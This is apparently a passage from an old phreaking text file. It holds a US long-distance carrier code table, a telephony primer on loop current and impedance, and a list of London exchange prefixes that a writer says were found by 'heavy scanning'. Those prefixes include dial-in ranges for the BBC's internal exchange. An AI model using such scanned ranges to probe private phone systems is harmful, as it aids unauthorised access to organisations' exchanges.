INC. 0866 AAM 1 ALLCOMM LONG DISTANCE, INC. 0075 AOM 1 ALLNET COMM. SVC., INC. [LDX, LEXITEL] 0444 ALN 48 ALTERNATE COMM TECHNOLOGY, INC. 0405 ACX 3 AMERICALL COMMUNICATIONS 0682 AIY 5 AMERICALL CORPORATION (CALIF.) 0099 ARZ 2 AMERICAN COMMUNICATIONS INT'L, LTD. 0145 ANU 2 AMERICAN COMMUNICATIONS NETWORK, INC. 0061 AZC 1 AMERICAN COMMUNICATIONS TECHNOLOGY, INC. 0645 AXC 1 AMERICAN DISCOUNT TELECOMMUNICATIONS, INC. 0598 AOU 1 AMERICAN LONG DISTANCE CORPORATION 0028 VOB 1 AMERICAN LONG DISTANCE EXCHANGE, INC. 0540 AXL 6 AMERICAN LONG DISTANCE SERVICES 0504 AMF 1 AMERICAN LONG LINES 0241 ALG 9 AMERICAN NETWORK EXCHANGE, INC. 0370 ANK 26 AMERICAN SHARECOM, INC. 0322 ASI 14 AMERICAN TELCO NETWORK SERVICES, INC. 0663 ANN 1 AMERICAN TELECOMMUNICATIONS ENTERPRISES 0813 AEW 18 AMERICAN TELECOMMUNICATIONS HOLDING, LTD. 0573 AMH 1 AMERICAN TELEPHONE NETWORK 0648 AZN 15 AMERICAN TELNET, INC. 0307 AQA 0 AMERICOM COMMUNICATIONS 0567 AMS 4 AMERISYSTEMS, INC. 0362 EOC 2 AMERITEL LONG DISTANCE, INC. 0975 ALQ 1 AMNET, INC. 0128 AXT 1 AMPTELCO CORPORATION 0267 APC 1 AMVOX 0617 AVX 1 ANSWER-NET, INC. 0143 AWE 1 APPLE COMMUNICATIONS 0095 AZL 2 APPLIED SIGNAL CORPORATION 0256 APD 1 ARCH TELECOM 0304 LUS 1 ASCENDING TECHNOLOGIES 0139 AWT 1 ASSOCIATED TELENET, INC./ A CTI COMPANY 0279 ASN 1 AT&T COMMUNICATIONS 0288 ATX 50 ATLANTIC TELEPHONE COMPANY, INC. 0125 AQT 1 ATX TELECOMMUNICATIONS SERVICES 0004 ATZ 12 AUSTIN BESTLINE 0302 ABN 1 AUTOMATED COMMUNICATIONS, INC. 0244 AUD 8 AUTOMATED TELEPHONE 0235 EMT 2 AUTUMN COMMUNICATIONS, INC. 0779 AUX 4 B.R. COMMUNICATIONS 0791 BRR 1 BEE LINE LONG DISTANCE 0276 BLE 1 BITTEL TELECOMMUNICATIONS CORPORATION 0867 BTL 1 BIXBY TELEPHONE LONG DISTANCE CO. 0580 BXT 1 BIZ TEL LONG DISTANCE TELEPHONE CO. 0606 BIZ 1 BRANSON TELEPHONE 0836 BRN 1 BROWER NETWORK 1 0037 NWO 4 BUDGET CALL LONG DISTANCE 0368 BUC 16 BURLINGTON TELEPHONE COMPANY 0515 BUR 6 BUSINESS CHOICE NETWORK 0736 BCH 1 BUSINESS TELECOM, INC. 0833 BTM 9 C & G ASSOCIATES 0788 SIG 1 CABLE & WIRELESS COMM, INC. (TDX) 0223 TDX 49 CALL AMERICA 0300 CMA 4 CALL AMERICA BUSINESS COMM. CORP. 0344 CBU 1 CALL AMERICA OF PALM DESERT 0410 CPD 1 CALL AMERICA OF RIVERSIDE 0351 CRV 2 CALL FOR LESS LONG DISTANCE 0259 CFX 1 CALL SAVERS, INC. 0291 CSF 1 CALL TECHNOLOGY CORP. OF PHILADELPHIA 0091 CTG 2 CALL-USA, INC. 0429 FNS 1 CAM-NET, INC. 0046 CNZ 1 CAMBRIDGE COMMUNICATIONS 0487 CBG 1 CAMERON LONG DISTANCE 0670 CAO 1 CAPITAL NETWORK SYSTEMS, INC. 0425 CAQ 20 CAPITAL TELECOMMUNICATIONS, INC. 0221 CPL 11 CARIBBEAN TELEPHONE & TELEGRAPH, INC. 0383 CIB 1 CELLULAR LONG DISTANCE CO. 0530 CUL 1 CELLULAR, INC. 0748 CLW 0 CENTURY AREA LONG LINES 0550 CAL 1 CENTURY TELECOMMUNICATIONS, INC. 0914 SMD 2 CHADWICK TELEPHONE 0909 CWV 4 CHERRY COMMUNICATIONS 0270 CHY 11 CHILLICOTHE LONG DISTANCE 0293 LSP 1 CINCINNATI BELL LONG DISTANCE, INC. 0654 CBD 6 CITYNET COMMUNICATIONS, INC. 0774 CYU 1 CLEARTEL COMMUNICATIONS 0548 CRZ 12 CLIFTON PHONE SYSTEMS 0309 CFP 1 COACHELLA VALLEY COMM. dba INTEG. OP. SVCS 0629 CHL 2 COAST INTERNATIONAL, INC. 0063 CIZ 5 COAST TO COAST TELECOMMUNICATIONS 0902 MWT 1 COASTAL AUTOMATED COMMUNCATIONS CORP. 0966 AUC 11 COLONIAL ENTERPRISE, INC. 0329 CQL 2 COLORADO RIVER COMMUNICATIONS 0306 CDR 1 COLUMBIA TEL 0918 CBA 1 COMCENTRAL dba SOUTHNET SERVICES, INC. 0934 SUH 1 COMCENTRAL, INC. 0611 COX 1 COMMONWEALTH LONG DISTANCE CO. 0336 CWZ 4 COMMUNICATION SERVICES OF COLORADO 0675 NSL 1 COMMUNICATIONS BROKERS, INC. 0640 NBK 1 COMMUNICATIONS CABLE LAYING CO., INC. 0339 CAB 2 COMMUNICATIONS GATEWAY NETWORK, INC. 0643 CGW 1 COMMUNICATIONS OPTIONS, INC. 0073 CPW 1 COMMUNICATIONS TELESYSTEMS, INTL. (CTI) 0502 CXM 15 COMMUNICATIONS, INC., dba ECI 0667 THG 1 COMMUNIQUE TELECOMMUNICATIONS, INC. 0810 CQE 7 COMWEST COMMUNICATIONS 0238 CWS 1 CONNECT AMERICA COMMUNICATIONS, INC. 0660 CQA 9 CONNECT AMERICA CORP. 0374 CQB 6 CONQUEST 0319 CQO 26 CONSOLIDATED NETWORK, INC. 0725 CDN 13 CONTACT AMERICA, INC. 0646 COA 1 CONTINENTAL LONG DISTANCE 0701 CWG 1 CONTINENTAL TELECOMMUNICATIONS GROUP 0612 CGR 1 CORPORATE TELEMANAGEMENT GROUP 0690 CGP 6 CUSTOM TELECOM. NETWORK OF ARIZONA 0586 CZZ 2 CYBERLINK 0618 CYB 1 CYPRESS TELECOMMUNICATIONS CORP., (CYTEL) 0203 CTQ 4 DATA & ELECTRONIC SERVICES, INC. 0147 DES 1 DELTA COMMUNICATIONS, INC. 0233 DLT 8 DELTACOM, INC. 0240 SIR 2 DELUXE DATA SYSTEMS 0693 DLX 3 DIAL LONG DISTANCE CORP. 0398 DSC 0 DIAL-NET, INC. 0969 DNI 7 DIGITAL NETWORK SERVICES, INC. 0064 DSV 2 DIGITAL NETWORK, INC. 0853 TXL 2 DIGITRAN CORP. 0543 DTR 5 EASTERN TELELOGIC CORPORATION 0303 ETL 2 EASTERN TELEPHONE SYSTEMS, INC. 0054 ETS 5 ECON-A-CALL, INC., OF HAYS 0497 ECA 1 ECONO-LINE WACO 0373 ECW 1 ECONO. CALL LONG DISTANCE SERVICES 0325 ECR 2 ECONOMY TELEPHONE, INC. 0060 ECY 1 EDS 0650 UTA 2 ELECTRIC LIGHTWAVE, INC. 0802 ELG 2 EMI COMMUNICATIONS CORPORATION 0365 EMI 5 ENVOY GLOBAL 0868 EGI 1 EQUICOM COMMUNICATIONS, INC. 0364 EQM 1 ETSC 0048 ETM 1 EXCEL TELECOMMUNICATIONS, INC. 0752 EXL 2 EXECULINES OF SACRAMENTO 0511 ESM 5 EXECULINES OF THE NORTHWEST, INC. 0705 ENW 2 FARMERS LONG DISTANCE, INC. 0531 FAR 1 FEB CORPORATION 0922 FEB 0 FEDERAL TRANSTEL, INC. 0285 FTT 0 FEIST LONG DISTANCE 0679 SWB 3 FIBERLINK COMMUNICATIONS CORP. 0051 FBL 1 FIBERTECH TELECOM, INC. 0479 FTI 4 FIRST FONE LONG DISTANCE 0935 FSL 2 FIRSTEL 0475 FTL 3 FLEX COMMUNICATIONS SYSTEM 0096 FLX 3 FONE AMERICA, INC. 0503 FAC 4 FOX COMMUNICATIONS CORPORATION 0637 FOX 3 FUTURE TELEPHONE COMMUNICATIONS 0121 FRE 1 GENERAL COMMUNICATION, INC. 0077 GCN 2 GLENS FALLS LONG DISTANCE SERVICES 0295 GFS 1 GULF LONG DISTANCE, INC. 0962 GLG 3 HAWAIIAN TELEPHONE COMPANY 0015 HWT 1 HEARTLINE COMMUNICATIONS, INC. 0009 HER 4 HEDGES & ASSOCIATES 0049 HDG 1 HEREFORD LONG DISTANCE SERVICES 0584 WRU 1 HI-PLAINS NTS COMMUNICATIONS 0722 HPL 1 HOGAN COMMUNICATIONS 0965 HOG 2 HOME OWNERS LONG DISTANCE, INC. 0882 HOL 1 HOTEL NETWORKS 0575 HNT 1 HSS VENDING DISTRIBUTORS 0392 HSV 0 ICON COMMUNICATIONS CORP. 0706 ICU 2 IFC COMMUNICATIONS 0141 IFF 0 INFO-TEL, INC. 0433 IFT 0 INFOACCESS, INC. 0172 IFA 0 INFORMATICS, INC. 0583 IFC 5 INNOVATIVE COMMUNICATIONS, INC. 0510 INV 1 INTEGRATED SYSTEMS CORPORATION 0696 IGA 1 INTEGRETEL, INC. 0402 IGT 0 INTELCO 0465 TEC 2 INTELLICALL OPERATOR SERVICES 0034 ICH 1 INTERAMERICAN TELEPHONE CO. (ITC) 0936 IAT 1 INTERLINK TELECOMMUNICATIONS 0904 ILK 2 INTERNATIONAL AUDIOTEXT NETWORK, INC. 0509 IAN 9 INTERNATIONAL CELLULAR, INC. 0943 CEO 1 INTERNATIONAL PACIFIC 0589 IPC 7 INTERNATIONAL TELECOMMUNICATIONS CORP. 0519 IZT 0 INTERSTATE TELECOM SVCS., INC. 0964 ILC 1 INTL. 800 TELECOM dba TELECALL LONG DIST. 0685 NTI 1 IOWA NETWORK SERVICES, INC. 0225 IAS 2 ITC NETWORKS 0468 IUT 4 KENTUCKY TELEPHONE CORPORATION 0062 KTC 1 KEYSTONE LONG DISTANCE 0699 KYL 6 KEYSTONE TELECOM, INC. 0545 KST 1 KEYSTONE TELECOMMUNICATIONS, INC. 0703 KSN 1 KRB TELECOM 0989 KRB 4 L.D. NETWORK, INC. 0931 LDQ 1 L.D. SERVICES, INC. 0280 LSE 4 LA CONEXION FAMILIAR, INC. 0926 LCF 4 LAKE STATES COMMUNICATIONS, INC. 0552 LKS 1 LANDMARK COMMUNICATIONS COMPANY, INC. 0193 LMK 1 LCI 0562 LCZ 4 LCI INTERNATIONAL/LITEL 0432 LGT 45 LCT LONG DISTANCE 0561 LKC 1 LDB INTERNATIONAL CORPORATION 0477 LDB 9 LDDS 0450 LDD 49 LDS OF ALEXANDRIA 0036 LDA 1 LDS OF MONROE 0036 LMN 1 LDS OF SHREVEPORT 0036 LSH 1 LECNET, INC. 0299 TFP 1 LINKUSA CORPORATION 0563 LNK 1 LINTEL SYSTEMS/LTLD 0579 LNS 1 LOCATE TELEPHONE COMPANY 0512 LAT 1 LONE STAR TELECOM 0205 LST 1 LONG DISTANCE AMERICA 0035 CWK 2 LONG DISTANCE COMMUNICATIONS 0607 LDC 1 LONG DISTANCE DISCOUNT, INC. 0533 LGD 6 LONG DISTANCE MANAGEMENT 0536 LDM 4 LONG DISTANCE MANAGEMENT, INC. 0382 LGM 1 LONG DISTANCE NETWORK 0395 LOS 4 LONG DISTANCE NORTH OF NEW HAMPSHIRE 0516 LNH 5 LONG DISTANCE OF MICHIGAN 0631 LMI 14 LONG DISTANCE OHIO, INC. 0564 LOH 1 LONG DISTANCE SAVERS 0036 LSI 6 LONG DISTANCE TELEPHONE SAVERS, INC. 0213 LTS 3 LONG DISTANCE TRANSFER, INC. 0069 LOG 3 MANITOWOC LONG DISTANCE SERVICE 0357 MTZ 1 MARATHON COMMUNICATIONS 0014 MHZ 1 MATRIX TELECOM 0780 MXT 7 MCI 0222 MCI 50 METRO ONE DIRECT 0565 MDI 1 METRO TELECOM, INC. 0692 MEO 0 METRO TELECOMM. SVCS., INC. dba METROCOMM 0860 TWH 3 METRO TELEPHONE, INC. 0635 MHE 1 METRONET LONG DISTANCE COMMUNICATIONS 0258 MLD 1 MFS INTELENET, INC. 0440 MFZ 3 MID ATLANTIC TELECOM 0086 MAD 9 MID-COM COMMUNICATIONS, INC. 0495 MIZ 2 MIDCO COMMUNICATIONS 0338 MIT 1 MIDCOM OF ARIZONA, INC. 0558 MDL 1 MIDTEL LONG DISTANCE MINOT 0932 MMN 1 MIDWEST TELECOM 0980 MWS 1 MIDWEST TELEPHONE SERVICE, INC. 0680 MDW 1 MINNESOTA INDEPENDENT.INTEREXCH.CO./MIIC 0264 MEN 1 MOUNTAINEER LONG DISTANCE, INC. 0923 MOI 4 MRC TELECOMMUNICATIONS, INC. 0912 NLG 1 MULTIMEDAI TELEPHONE SERVICE, INC. 0829 MUE 1 MUSTANG TELE-COMMUNICATIONS, INC. 0688 MNG 1 MVP COMMUNICATIONS, INC. 0827 SZT 1 NACT dba NETWORK TELEMANAGEMENT SERVICES 0806 NTG 1 NAPA VALLEY TELECOM SERVICES 0794 NVT 2 NATIONAL BRANDS, INC. 0549 NBI 1 NATIONAL DATA CORPORATION 0632 NLD 2 NATIONAL FIBERNET, INC. 0326 NFB 1 NATIONAL INDEPENDENT CARRIER EXCH., INC. 0059 GLD 2 NATIONAL TECHNICAL ASSOCIATES dba NTA 0683 NTK 1 NATIONAL TELE-SAV, INC. 0341 NSV 1 NATIONAL TELECOM. OF FLORIDA 0657 NFL 1 NATIONAL TELEPHONE EXCNAGE (PA) 0746 NLE 2 NATIONAL TELEPROCESSING, INC. 0697 NZT 1 NATIONAL TELESERVICE 0401 NNL 3 NATIONWIDE COMMUNICATIONS, INC. 0716 NND 3 NATIONWIDE LONG DISTANCE 0403 NGD 1 NCHE TELECOMMUNICATIONS NETWORK, INC. 0017 NCE 1 NET EXPRESS COMMUNICATIONS, INC. 0388 NXC 2 NETWORK BILLING AND COLLECTIONS, INC. 0871 NBZ 1 NETWORK LONG DISTANCE 0765 DCT 1 NETWORK ONE 0135 NOE 2 NETWORK OPERATOR SERVICES, INC. 0308 NOS 4 NETWORK USA 0881 CNK 1 NEW ENGLAND TELEDISCOUNT SYSTEMS, INC. 0940 NED 1 NEW TIMES, INC. 0945 NWM 0 NICKEL FONE 0423 NFN 1 NORTH AMERICAN COMMUNICATIONS, INC. 0933 NAC 2 NORTH AMERICAN TELEPHONE 0201 NHT 1 NORTH COUNTY COMMUNICATIONS CORPORATION 0890 NHC 6 NORTHERN ARIZONA COMMUNICATIONS CORP. 0491 NAR 1 NORTHERN TELECOM INC. 0376 NTQ 1 NORTHERN WISCONSIN L.D.S. 0713 NWD 1 NORTHLAND TELEPHONE SYSTEMS, LTD. 0332 NRD 1 NORTHWEST TELECOM, LTD. 0638 NWT 1 NORTHWEST TELECOMMUNICATIONS CO. 0212 NWS 3 NTC, INC. 0908 NCQ 3 NTS COMMUNICATIONS, INC. 0469 GMW 6 NTS NETOWRK TELECOMMUNICATIONS SERVICES 0644 SVV 1 NUESTRA TELEFONICA 0407 NUE 1 O.L.C. COMPANY 0651 OLC 1 OCOM CORPORATION 0590 OCO 1 ONCOR COMMUNICATIONS, INC. 0805 ONR 33 ONE CALL COMM. dba OPTICOM [ONE] 0880 SVL 33 ONE-2-ONE COMMUNICATIONS 0390 PRO 13 OPERATOR SERVICE CO. 0891 CIN 4 PACE LONG DISTANCE SERVICE 0757 PAC 13 PARKWAY COMMUNICATIONS, INC. 0553 PRK 1 PAY TEL COMMUNICATIONS, INC. 0917 PAY 1 PAYLINE SYSTEMS, INC. 0767 PLS 8 PDQ COMMUNICATIONS SOURCE 0178 PDQ 2 PENINSULA LONG DISTANCE SERVICE, INC. 0743 PLD 1 PEOPLE'S TELEPHONE COMPANY, INC. 0227 CYN 5 PEOPLES COMMUNCATIONS, INC. 0728 PIO 1 PHONE BASE SYSTEMS, INC. 0380 PHB 1 PHONE ONE 0393 EXF 1 PHONETEL TECHNOLOGIES, INC. 0838 PHT 6 PILGRIM TELEPHONE, INC. 0930 PLG 2 POLAR COMMUNICATIONS CORPORATION 0967 PLR 15 PREFERRED NETWORK 0976 PFR 1 PREMIER LONG DISTANCE SVCS., INC. 0342 PIE 1 PRIME TIME COMMUNICATIONS 0954 PRI 1 PRO TAS TELECOMMUNICATIONS 0673 PFE 1 PROTEL, INC. 0418 PTZ 0 PSA, INC. 0045 PSA 1 PSP MARKETING GROUP, INC. 0249 PMG 1 PUBLIC PHONE 0255 PUP 2 PUBLIC SERVICE COMPANY OF NEW MEXICO 0830 PSV 1 PUBLIC SWITCH CORP. 0740 PSW 1 QUEST TELECOMMUNICATIONS, INC. 0971 APV 1 R D & J COMMUNICATIONS MGMT., INC. 0642 RDJ 7 RANGER TELECOMMUNICATIONS 0047 RGR 1 RCI LONG DISTANCE 0003 RTC 26 READY CALL, INC. 0605 ESY 1 RESURGENS COMMUNICATION GROUP 0782 STE 4 RESURGENS WEST, INC. 0471 UEL 1 SCHNEIDER COMMUNICATIONS 0500 SCH 7 SCIENCE DYNAMICS CORPORATION 0609 SDD 1 SECURITEX dba TYLERNET LONG DISTANCE 0254 TYR 1 SHARED COMMUNICATIONS SERVICES, INC. 0246 SHD 2 SHARED USE NETWORK 0018 SNK 2 SHOW-ME LONG DISTANCE, INC. 0778 SHW 1 SONIC COMMUNICATIONS, INC. 0126 SNU 1 SOUTH CAROLINA NETWORK, INC. 0807 SNZ 1 SOUTHERN NEW ENGLAND TELEPHONE (SNET) 0763 SNG 1 SOUTHTEL CORPORATION 0792 SZU 4 SOUTHWEST UNITED COMMUNICATION, INC. 0993 SUC 1 SOUTHWESTERN TELECOM, INC. 0005 SOW 1 SP TELECOM 0056 SPA 6 SPRINT 0333 UTC 50 ST. JOE COMMUNICATIONS, INC. 0744 SJE 1 STANDARD COMMUNICATIONS, INC., dba SCI 0248 SCQ 1 STANDARD TELCOM, INC. 0352 STD 1 STAR TEL 0313 STR 1 STAR TEL OF ABILENE 0787 STT 1 STAR TEL OF VICTORIA 0983 STV 1 STAR TEL TRANSMISSION CO., INC. 0984 STA 1 STARTEC, INC. 0719 STZ 1 STENOCALL 0929 STO 1 STONE & COMPANY 0184 SOZ 1 SUNSHINE TELEPHONE, INC. dba SUNTEL 0784 SNH 1 SUNTEL, INC. 0247 SUL 3 SWITCH 2000, INC. 0727 SWH 3 SYNERGY TELEMANAGEMENT 0795 SGY 1 T M SEPULVEDA, INC. 0358 SEP 3 T-TEL 0493 TRF 2 TACONIC LONG DISTANCE SERVICE, CORP. 0245 TDT 4 TALTON TELECOMMUNICATIONS CORPORATION 0849 TWL 1 TCI COMMUNICATIONS, INC. 0560 TUC 3 TEASE COMMUNICATIONS 0883 TZY 2 TEL AMERICA 0700 TMU 7 TEL NET, INC. 0919 TNT 1 TEL OPTIC, INC., dba CALL AMERICA 0489 HGS 5 TEL SERV 0378 ALP 1 TEL-AMERICA NETWORK SERVICES, INC. 0274 TNW 3 TEL-CENTRAL OF JEFFERSON CITY 0218 TCQ 1 TEL-COM, INC. 0815 TEZ 1 TEL-SHARE 0330 TSH 1 TEL-SPAN COMMUNICATIONS, INC. 0520 TSW 1 TELALEASING ENT. INC. dba PHONE ZONE, INC. 0397 PZF 1 TELAMARKETING COMM OF BIRMINGHAM 0007 TOB 1 TELAMARKETING COMM OF MONTEREY 0007 TMY 1 TELAMARKETING COMM OF PIEDMONT 0007 TPI 1 TELAMARKETING COMM OF THE TRI-STATES 0007 TAE 1 TELAMARKETING COMMUNICATIONS, INC. 0007 TAM 11 TELAMERICA COMMUNICATIONS, INC. 0749 VCE 1 TELCO COMMUNICATIONS GROUP, INC. 0457 TDG 1 TELE TECH, INC. 0915 TTH 0 TELE-COMMUNICATIONS INT'L 0958 TTW 1 TELE-MATIC CORP. 0655 TMW 5 TELE-SYS, INC. 0482 TEI 1 TELECABLE CORPORATION 0845 TBQ 4 TELECOLUMBUS, USA dba WORLDCOM 0953 WDC 3 TELECOM WEST 0529 LWC 1 TELECOMMUNICATIONS CONSULTANTS, INC. 0029 TQC 1 TELECON COMMUNICATIONS CORPORATION 0518 TOX 1 TELECORP INTERNATIONAL 0985 TQI 2 TELEDATA INTERNATIONAL, INC. 0481 TDE 1 TELEGROUP 0630 TGP 0 TELEMANAGEMENT CONSULTANTS CORPORATION 0458 TGN 3 TELENATIONAL COMMUNICATIONS 0621 TZX 7 TELEPHONE ASSOC. LONG DISTANCE SERVICES 0837 TDS 2 TELEPHONE ASSOC., dba FERGUS FALLS LD 0498 FRG 1 TELEPHONE COMMUNICATIONS CORPORATION 0977 THZ 1 TELEPHONE ELECTRONICS NETWORK, LTD. 0745 TRW 0 TELEPHONE EXPRESS 0899 TEC 6 TELESAVER OF NEW MEXICO 0026 ABQ 1 TELESCAN, INC. 0731 TZC 2 TELEVOX PUBLIC COMMUNICATIONS, INC. 0409 TXV 1 TELNEX, INC. 0296 TXI 1 TELSTAR COMMUNICATIONS,INC. 0873 TPD 10 TELTRUST NETWORK SERVICES 0485 TUT 11 TELVUE COPORATION 0707 SDY 22 TEXUSTEL, INC. 0331 TXT 1 THE COMMUNIGROUP 0268 CUT 11 THE PAY TELEPHONE CO. 0798 PYT 1 THE REAL PUBLIC TELEPHONE COMPANY, INC. 0896 REL 1 THE SWITCHBOARD 0385 SBD 1 TMC LONG DISTANCE 0019 TSD 1 TMC OF LEXINGTON 0462 TLX 1 TMC OF OMAHA 0007 TOH 3 TMC OF SOUTHERN KENTUCKY 0942 TBG 1 TOTAL TELECOMMUNICATIONS, INC. 0848 TIO 1 TOTAL-TEL USA, INC. 0081 TTU 14 TOTALNET COMMUNICATIONS, INC. 0346 TQL 1 TOUCH 1, INC. 0797 TOA 20 TOUCH AMERICA, INC. 0335 THA 2 TOUCH-1 LONG DISTANCE, INC. 0751 TUH 8 TRANSACTION NETWORK SERVICES 0522 TAX 1 TRANSPACIFIC TELECOMMUNICATIONS, INC. 0578 TPF 3 TRI*TEL COMMUNICATIONS 0874 TIQ 7 TRI-STATE COMMUNICATIONS, INC. 0472 TIE 1 TRT TELECOMMUNICATIONS CORP. 0120 TRT 8 TTE OF CHARLESTON 0461 TTQ 1 U S COMNET 0229 UZC 2 U.S. ADVANTAGE LONG DISTANCE 0596 UAV 1 U.S. COMMUNCATIONS INC. 0879 USI 5 U.S. CONNECT CORPORATION 0574 USJ 5 U.S. FIBERCOM 0941 UFZ 1 U.S. FIBERLINE COMMUNICATIONS, INC. 0576 UFL 1 U.S. LINK 0355 USL 3 U.S. LONG DISTANCE, INC. 0556 ULD 12 U.S. NET, INC. 0298 USZ 1 U.S. NETWORK 0271 LNO 3 U.S. TELE-COMM, INC. 0396 USQ 1 ULTIMATE COMMUNICATIONS CORPORATION 0822 ULM 1 UNI-TEL OF FARMINGTON 0907 UNT 1 UNION TELEPHONE COMPANY 0855 UTT 3 UNITED COMMUNICATIONS, INC. 0955 PCL 1 UNITED L.D.S. 0840 UDS 1 UNITED TELEPHONE CO. dba TELAMERICA L.D. 0544 UTD 1 UNITED TELEPHONE LONG DISTANCE 0204 ULG 8 UNITED TELESYSTEMS, INC. 0861 USY 1 UNITEL 0863 UNE 1 UNITEL COMMUNICATIONS, INC. 0869 UCN 1 US COMM. INC., dba SOUTHWEST L.D.N., INC. 0568 JNT 3 US WATS 0200 UWT 6 VADACOM 0057 VDC 2 VALLEY STAR-TEL 0878 VST 1 VALU-LINE OF AMARILLO 0669 VOA 4 VALU-LINE OF KANSAS 0678 VLK 1 VALU-LINE OF LONGVIEW, INC. 0859 VLW 1 VALU-LINE OF ST. JOSEPH 0889 VSJ 1 VALUE-ADDED COMMUNICATIONS 0817 VAC 6 VARTEC dba METROTEL LONG DISTANCE 0818 MZL 23 VIP CONNECTIONS, INC. 0847 VPC 1 VRS BILLING SYSTEMS, INC. 0903 VSL 1 VTA, INC. 0041 CIS 1 WAUSAU LONG DISTANCE SERVICE 0753 WLD 1 WCS OPERATORS 0712 WCS 1 WEST COAST TELECOMMUNICATIONS, INC. 0569 WCU 45 WESTCOM LONG DISTANCE 0459 THT 1 WESTCOM, INC. 0938 WCO 5 WESTEL INC. 0085 WES 12 WESTERN OKLAHOMA INFORMATION SYSTEMS 0443 WOI 1 WESTERN TELECOM, INC. 0427 WTK 3 WESTERN TELENET, INC. 0431 WST 1 WILTEL 0555 WTL 49 YAVAPAI TELEPHONE EXCHANGE 0766 YTE 1 ZENEX LONG DISTANCE, INC. 0761 CJL 1 ZERO PLUS DIALING 0756 XZP 1 ===================================EOF=========================================== %%%%%%%%%%%%%%%%%%%%%%%% \ STD Phone Codes \- %%%%%%%%%%%%%%%%%%%%%%%% [foneman] Someone emailed me about STD Codes in Londen. So after doing some heavy scanning here you go... Have Fun, I'll be back in kv6. LONDEN STD CODES 0171 210 xxxx Westminster NOX 211 xxxx Westminster 0171 212 xxxx Westminster 0171 230 xxxx Westminster (New Scotland Yard) 0181 255 xxxx Telewest Communications 0171 256 xxxx City of London (Moorgate) 0171 257 xxxx Covent Garden 0171 258 xxxx Paddington 0171 259 xxxx Belgravia or Brixton (!) 0181 281 xxxx Cable & Wireless (cable) for Buckhurst Hill, Essex 0171 283 xxxx City of London (Monument) 0171 308 xxxx Cable and wireless for private London Transport extensions 0181 317 xxxx Woolwich and Plumstead 0181 318 xxxx Lewisham 0181 319 xxxx Woolwich, Eltham and Greenwich 0171 321 xxxx Westminster 0171 323 xxxx Bloomsbury 0171 374 xxxx City of London (Moorgate) 0171 382 xxxx City of London (Moorgate) 0171 383 xxxx Euston 0171 385 xxxx Fulham 0171 386 xxxx Fulham 0181 395 xxxx Telewest (cable) Croydon 0181 395 xxxx Telewest (cable) Merton (Morden, Mitcham, Wimbledon) 0181 395 xxxx Telewest (cable) Sutton 0181 395 xxxx Telewest (cable) Richmond 0181 472 xxxx East Ham 0171 474 xxxx Plaistow and Canning Town 0181 475 xxxx Upton Park 0171 476 xxxx Plaistow and Canning Town 0181 478 xxxx Ilford 0171 487 xxxx St Marylebone 0171 488 xxxx City of London and Wapping 0171 489 xxxx City of London (St.Pauls) 0181 491 xxxx Cable & Wireless (cable) for Woodford, Essex 0181 576 1xxx Direct dial-in to BBC's EBX 0181 576 7xxx Direct dial-in to BBC's EBX ===================================EOF=========================================== %%%%%%%%%%%%%%%%%%%%%%%% \ Telephony \- %%%%%%%%%%%%%%%%%%%%%%%% julian@bongo.info.com - Everybody has one, but what makes it work? Although telephones and telephone company practices may vary dramatically from one locality to another, the basic principles underlying the way they work remain unchanged. Every telephone consists of three separate subassemblies, each capable of independent operation. These assemblies are the speech network, the dialing mechanism, and the ringer or bell. Together, these parts - as well as any additional devices such as modems, dialers, and answering machines - are attached to the phone line. The phone line A telephone is usually connected to the telephone exchange by about three miles (4.83 km) of a twisted pair of No.22 (AWG) or 0.5 mm copper wires, known by your phone company as "the loop". Although copper is a good conductor, it does have resistance. The resistance of No.22 AWG wire is 16.46 Ohms per thousand feet at 77 degrees F (25 degrees C). In the United States, wire resistance is measured in Ohms per thousand feet; telephone companies describe loop length in kilofeet (thousands of feet). In other parts of the world, wire resistance is usually expressed as Ohms per kilometer. Because telephone apparatus is generally considered to be current driven, all phone measurements refer to current consumption, not voltage. The length of the wire connecting the subscriber to the telephone exchange affects the total amount of current that can be drawn by anything attached at the subscriber's end of the line. In the United States, the voltage applied to the line to drive the telephone is 48 VDC; some countries use 50 VDC. Note that telephones are peculiar in that the signal line is also the power supply line. The voltage is supplied by lead acid cells, thus assuring a hum-free supply and complete independence from the electric company, which may be especially useful during power outages. At the telephone exchange the DC voltage and audio signal are separated by directing the audio signal through 2 uF capacitors and blocking the audio from the power supply with a 5- Henry choke in each line. Usually these two chokes are the coil windings of a relay that switches your phone line at the exchange; in the United States, this relay is known as the "A" relay (see fig.1). The resistance of each of these chokes is 200 Ohms. We can find out how well a phone line is operating by using Ohm's law and an ammeter. The DC resistance of any device attached to the phone line is often quoted in telephone company specifications as 200 Ohms; this will vary in practice from between 150 to 1,000 Ohms. You can measure the DC resistance of your phone with an Ohmmeter. Note this is DC resistance, not impedance. Using these figures you can estimate the distance between your telephone and the telephone exchange. In the United States, the telephone company guarantees you no lower current than 20 mA - or what is known to your phone company as a "long loop." A "short loop" will draw 50 to 70 mA, and an average loop, about 35 mA. Some countries will consider their maximum loop as low as 12 mA. In practice, United States telephones are usually capable of working at currents as low as 14 mA. Some exchanges will consider your phone in use and feed dial tone down the line with currents as low as 8 mA, even though the telephone may not be able to operate. Although the telephone company has supplied plenty of nice clean DC direct to your home, don't assume you have a free battery for your own circuits. The telephone company wants the DC resistance of your line to be about 10 megOhms when there's no apparatus in use ("on hook," in telephone company jargon); you can draw no more than 5 microamperes while the phone is in that state. When the phone is in use, or "off hook," you can draw current, but you will need that current to power your phone, any current you might draw for other purposes would tend to lower the signal level. The phone line has an impedance composed of distributed resistance, capacitance, and inductance. The impedance will vary according to the length of the loop, the type of insulation of the wire, and whether the wire is aerial cable, buried cable, or bare parallel wires strung on telephone poles. For calculation and specification purposes, the impedance is normally assumed to be 600 to 900 Ohms. If the instrument attached to the phone line should be of the wrong impedance, you would get a mismatch, or what telephone company personnel refer to as "return loss." (Radio Amateurs will recognize return loss as SWR.) A mismatch on telephone lines results in echo and whistling, which the phone company calls "singing" and owners of very cheap telephones may have come to expect. A mismatched device can, by the way, be matched to the phone line by placing resistors in parallel or series with the line to bring the impedance of the device to within the desired limits. This will cause some signal loss, of course, but will make the device usable. A phone line is balanced feed, with each side equally balanced to ground. Any imbalance will introduce hum and noise to the phone line and increase susceptibility to RFI. The balance of the phone line is known to your telephone company as "longitudinal balance." If both impedance match and balance to ground are kept in mind, any device attached to the phone line will perform well, just as the correct matching of transmission lines and devices will ensure good performance in radio practice. If you live in the United States, the two phone wires connected to your telephone should be red and green. (In other parts of the world they may be different colors.) The red wire is negative and the green wire is positive. Your telephone company calls the green wire "Tip" and the red wire "Ring". (In other parts of the 